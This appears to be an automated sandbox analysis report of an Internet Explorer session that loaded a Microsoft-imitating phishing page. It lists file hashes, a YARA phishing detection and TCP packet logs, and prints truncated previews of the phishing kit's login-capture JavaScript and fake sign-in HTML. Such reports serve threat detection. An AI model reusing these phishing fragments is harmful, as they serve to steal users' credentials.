SHA-512:	FD60491D599715CA3883B4E5ABFFD9618069812D2986E8EA0769F9503E8BDA6AAB4AF5797CCD39A505FD1110C4251AF85626316CD9B5DEE59FDDD083EE8E04C5
Malicious:	false
Reputation:	low
Preview:	<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="https://bms.kaseya.com/media/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d">here</a></body>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\actions[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	3262
Entropy (8bit):	5.697312232917473
Encrypted:	false
SSDEEP:	48:Ci7qshhTikYCCR6SusaLw5pzrzr2nskQWzBjwvs+s+ysZeeO8EjiYfO+bvMCX8D:KCPApiM3sAo7DvN4
MD5:	953786798E6E895D5306E93D7C73D5C6
SHA1:	DC84F8520E2640486837B10D5CF15BAB7355C5F9
SHA-256:	F80523F7881DA7D827349D5C1E7615719096944955E0DEC405B811E0CDF274BB
SHA-512:	982B0A70B3EE6D3B74E4D0B280804A38CA921B8D575A9CA83B9860A3F860EB3936D5E436AE02B254E860B081E83918613B6A932EB96CCE7EDAC7DAE894A7AC4F
Malicious:	false
Reputation:	low
IE Cache URL:	https://manmedia.org/offic/n.page/actions.js
Preview:	// JavaScript Document....(function(){....../*$('.ms-usertext').on('click', function(){.... $(".ms-loginbox").show(1000);.... $(".ms-loginbox2").hide(1000);....$('#email').val($('#me').text());...});............$('#FirstForm').on('submit', function(e){....console.log("Hello am here");....$('.overlay').show(1000);....$('#emailp').val($('#email').val());....$('#emailp1').val($('#emailp').val());....var er = $('#me').text($('#email').val());.. er.value = $('#email').val();.. er.readOnly = true;..........var user = $('#email').val();.....var uemail = user.split('@')[1];.....var domain = "http://logo.clearbit.com/"+uemail;..... .... $('#img1').attr("src", "https://www.google.com/s2/favicons?sz=64&domain_url="+uemail );..... $('.ms-logo2').hide();..............setTimeout(function() {.... $(".overlay").hide(1000);.... $(".ms-loginbox").hide(1000);.... $(".ms-loginbox2").show(1000);.. },2000);............e.preventDefault();...});............$('#SecondForm').o

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.395590914706752
Encrypted:	false
SSDEEP:	3:oVXUHSE3GS4s98JOGXnEHSE3GS4mn:o9U6S40qE6S4m
MD5:	4BF3BA8F15C5B85F4FFC3F9E36D6C94F
SHA1:	2606201AED41CDD19376137004631D12CD68222E
SHA-256:	98E06F29650EA9B96B9C5781F86242CF85CE9F649AC8949A0B1401D25280666E
SHA-512:	7EB46AC70FDBB4D3E137F50EAC9F7098FFA339B1AA898C7042E8D2E49027327AF349378E64DC9CED57C33EE9CDD7B88B2503AF91455361C5A90F78EDB1E6CABF
Malicious:	false
Reputation:	low
Preview:	[2021/02/23 16:02:00.547] Latest deploy version: ..[2021/02/23 16:02:00.547] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF08A6A974461167F6.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12981
Entropy (8bit):	0.44377563820500354
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loR9lox9lWWV1fXmX:kBqoIakewX
MD5:	D5E3C9203893F88011BB962AD80D737A
SHA1:	D9C8BDA90F75DFB38DC788038A00D9D3E7663F22
SHA-256:	7B6A02696741F8ECE286CB8949F535E636DA49D5D3F7CE428B86FEA051866F58
SHA-512:	4D94895A3087ADA5FEE10660D8EBC1AD59B3A93C95CD89973DF4F6E3FB5026D1581684BCC6231A7B322E049DAA298939C28A97CDB82A02A834F54D582B98B428
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF103DA5E400CC909F.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	25441
Entropy (8bit):	0.3456394706198164
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAggZi:kBqoxxJhHWSVSEabQ
MD5:	2188473FF2C6411DFC9BD09E21CB9BB5
SHA1:	0DC099E00DE056BAEEE659E08C2ACD6377C7CD4A
SHA-256:	043BD8C21E5F70C049556B0E26328D1EA16ED7CAB3DA7D81B2159A2407A462B2
SHA-512:	FDAEAA83E7EB91853247A0D0CC4A9A0BA9AF27D454927DF91193A8F21F7C110CA6BC3EC43BAB90D74F907CF6C488B7B00CB0351DB0E2ACA282B8829E40A89810
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF40225EC25177EE78.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	37087
Entropy (8bit):	0.8073439230751972
Encrypted:	false
SSDEEP:	48:kBqoxKkA2VA2sWA2fWA2LA2wA2+A2AA28XA2JMXA2KymZ72ag3b2Z9ZMg3yZ2wrG:kBqoxKkjiWRW9eMm6EkyIm3kZr3SBqx
MD5:	07B41549DF60666C34AFC8AB44F7D83A
SHA1:	F3EE2B46DD23EF40ECAA7C10D73CED82AD1319A3
SHA-256:	E5AF6406B2CBA15562F0CE1DCE3C913908C507B810E6E8DEBB7D149A80571FCD
SHA-512:	A117E107E8FDE3E05F117A92C681493B72ED59B2EF7752E06A9BA8D31F10B732B3142D1FDD497477EA7B15EEE35F5D9DA5B737E47A7D0E1C5344EAFE9811BA52
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF53DE5289B795A3FC.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	37087
Entropy (8bit):	0.8060826889501502
Encrypted:	false
SSDEEP:	48:kBqoxKkA2VA2sWA2fWA2LA2wA2+A2vA2zXA2aMXA2dnmZ72ag3s2Z9ZMg3s2wrZ8:kBqoxKkjiWRW9eMNxP3nIm3pZr3wBq9
MD5:	549B7989593C55AD479468C6431F9946
SHA1:	A936B593990818CCCBBA8031464537B086BDA31A
SHA-256:	DB21E85D96BCE592559BAD8B341858ABB69D2F976CCE1A820F0F80499875CE88
SHA-512:	CE8E960BB3BB0E10ED9882B82100257DCDA245236091C3553BB324AC2020B1A9C9D5E4860AC4CD12CBB23A5DAB5D227542B176A0BFFE53B9C4578D7AC3A19B55
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF777BD55EE7EDB1EC.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	37091
Entropy (8bit):	0.8130341619890422
Encrypted:	false
SSDEEP:	48:kBqoxKkA2VA2sWA2PWA2NA2HA2WA2AA2VA2C/A2CfrimZ72ag3b2Z9ZMg3b2wrZB:kBqoxKkjiWhWD58SfMEuIm3kZr37BqQ
MD5:	86EBA7C3D482DDB0BB6CB1A9F941078F
SHA1:	6DD7CAE1D4585C12D35FCAB3BEA4736602DF6C1D
SHA-256:	29F233433A36B88D5DEB26DADB1BB3032FD4DA7E9D1ED6603224D016A0DED156
SHA-512:	48467E79BA926131431F34F2F298CFC3598B824B3BA0E3AD86346A353C7F864E5313BE685FF90357EAD2E12D50273CAC02922D5053DB54C3C9FFAB48762F7C14
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF874DF126B3AAC6A6.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13445
Entropy (8bit):	0.7394554772018571
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loKLP9loKLP9lWKL4+c+Hv9dTodT0T:kBqoIKsKyKb7f66
MD5:	DE49C55E044A5418CE10304252C27F99
SHA1:	3BF28225F7B2A531B11B71A26624F71417B6BF45
SHA-256:	79A0170053D37E856546BB45319120475CD933F309532F7DF616568AF5936E36
SHA-512:	D9842F2DAB72FC2EFB2B219AE2166EFACA5E1133480B8735C35AEABDC41436FFCC181A3A134492BA24DE461A6CF9EB5E497E777BEC976B17A3C0C99DDBBCF988
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFA5536591CEF1A655.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	29989
Entropy (8bit):	0.32748736048125066
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwu9lwBk9l2I/9l2g9ls:kBqoxKAuvScS+B/I+hwy
MD5:	9B18CA3CC35B37CECFC610420B5334CC
SHA1:	F095D72BDB6E80738497B4009D24C3AE7E708E40
SHA-256:	574D388CECAE463DCA776ED97B3EBB0A05B7436B2B090157B227B234F8B3A0FA
SHA-512:	D3A4CCAEF187DD135873D95DEAA0702EC4DF209C57F777ACCC5B8493294785378337139B4C729B6BFC13F82C6C2ADB1F494F3AFBB0B65B7BF840CF1C21F32DA6
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partial Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	255366
Entropy (8bit):	6.093517370301889
Encrypted:	false
SSDEEP:	6144:SWqmT2RmEb2oUp9M5WnwGJUQo7xKOFqqbgvHzy8H0WqmT2RmEb2oUp9M5WnwGJUh:8WM5LGk1kcWM5LGk1km
MD5:	99A747B517553FEDEA4E383A3B257FB3
SHA1:	A1CED03F68CAFEEAED72CC4184788109B1500954
SHA-256:	FC09B0D19EE905B6CDEC8D0FC94ED424EDBA006BE87F702834D85176E703BE12
SHA-512:	04D37CEFDBA3998BC71ECBBCF2CDBB4E9F6FDD10A2E27E1A8B57FDAA19546DC49851D58A0ABB0A57A31B1F43C793AADBF567D423F8997A694547DF88C88A10B8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_HtmlPhish_10, Description: Yara detected HtmlPhish_10, Source: C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partial, Author: Joe Security
Reputation:	low
Preview:	....<html dir="ltr" class="" lang="en">....<head>.. <title>Sign in to your account</title>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">.. <meta http-equiv="Pragma" content="no-cache">.. <meta http-equiv="Expires" content="-1">.. <meta name="PageID" content="ConvergedSignIn">.. <meta name="SiteID" content="">.. <meta name="ReqLC" content="1033">.. <meta name="LocLC" content="en-US">.. <meta name="title" content="ES6-CrawlerDetect">.. .... <link rel="shortcut icon" href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">..<link rel="stylesheet" href="https://manmedia.org/offic/n.page/style.css" />.. <meta name="robots" content="none">..<script type="text/javascript" src="https://manmedia.org/of

C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partial:Zone.Identifier Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:gAWY3n:qY3n
MD5:	FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:	D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:	AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:	false
Reputation:	low
Preview:	[ZoneTransfer]..ZoneId=3..

C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html:Zone.Identifier Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	3
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:RW:w
MD5:	310DCBBF4CCE62F762A2AAA148D556BD
SHA1:	43814346E21444AAF4F70841BF7ED5AE93F55A9D
SHA-256:	556D7DC3A115356350F1F9910B1AF1AB0E312D4B3E4FC788D2DA63668F36D017
SHA-512:	5E3155774D39D97C5F9E17C108C2B3E0485A43AE34EBD196F61A6F8BF732EF71A49E5710594CFC7391DB114EDF99F5DA3ED96EF1D6CA5E598E85F91BD41E7EEB
Malicious:	false
Reputation:	low
Preview:	333

Static File Info

No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 16:02:02.050968885 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.052453995 CET	49720	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.171178102 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.171305895 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.172544003 CET	443	49720	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.175298929 CET	49720	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.178323030 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.178632975 CET	49720	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.298767090 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.298840046 CET	443	49720	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.301035881 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.301074028 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.301100016 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.301126003 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.301152945 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.301244974 CET	443	49720	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.301265955 CET	443	49720	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.301271915 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.301285982 CET	443	49720	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.301310062 CET	443	49720	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.301347017 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.301357031 CET	49720	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.301426888 CET	49720	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.378355980 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.378956079 CET	49720	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.387079954 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.387329102 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.387911081 CET	49720	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.500047922 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.500185013 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.500305891 CET	443	49720	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.500950098 CET	49720	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.501323938 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.502074957 CET	49720	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.507334948 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.507468939 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.508116961 CET	443	49720	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.508233070 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.508233070 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.508290052 CET	49720	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.508306026 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.514368057 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.634269953 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.663181067 CET	443	49720	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.732990026 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.733036041 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.733051062 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.733073950 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.733095884 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.733117104 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.733136892 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.733139992 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.733165026 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.733194113 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.733206987 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.733216047 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.733243942 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.733273983 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.854816914 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.854855061 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.854876041 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.854897022 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.854919910 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.854943037 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.854967117 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.854978085 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.854988098 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.855010986 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.855032921 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.855051994 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.855053902 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.855073929 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.855097055 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.855098009 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.855122089 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.855139971 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.855145931 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.855169058 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.855170012 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.855190992 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.855214119 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.855216980 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.855237007 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.855261087 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.855264902 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.855299950 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975019932 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975071907 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975092888 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975115061 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975138903 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975161076 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975163937 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975184917 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975193024 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975208044 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975229979 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975250959 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975269079 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975274086 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975285053 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975296974 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975322962 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975326061 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975346088 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975368023 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975368023 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975387096 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975390911 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975414038 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975425959 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975435019 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975451946 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975469112 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975491047 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975502014 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975512028 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975534916 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975548983 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975558043 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975579977 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975583076 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975600004 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975601912 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975620985 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975641966 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975653887 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975687981 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975707054 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975737095 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975750923 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975760937 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975781918 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975792885 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975810051 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975836992 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975838900 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975863934 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975884914 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975888014 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975917101 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975924015 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975940943 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975944042 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975965977 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.975969076 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975991011 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.975999117 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.976012945 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:02.976032019 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:02.976047993 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.095540047 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095582008 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095607042 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095633984 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095659018 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095684052 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095693111 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.095707893 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095719099 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.095732927 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095757961 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.095757961 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095778942 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.095788002 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095809937 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.095813990 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095827103 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.095839024 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095846891 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.095863104 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095875025 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.095889091 CET	443	49719	52.144.52.222	192.168.2.6
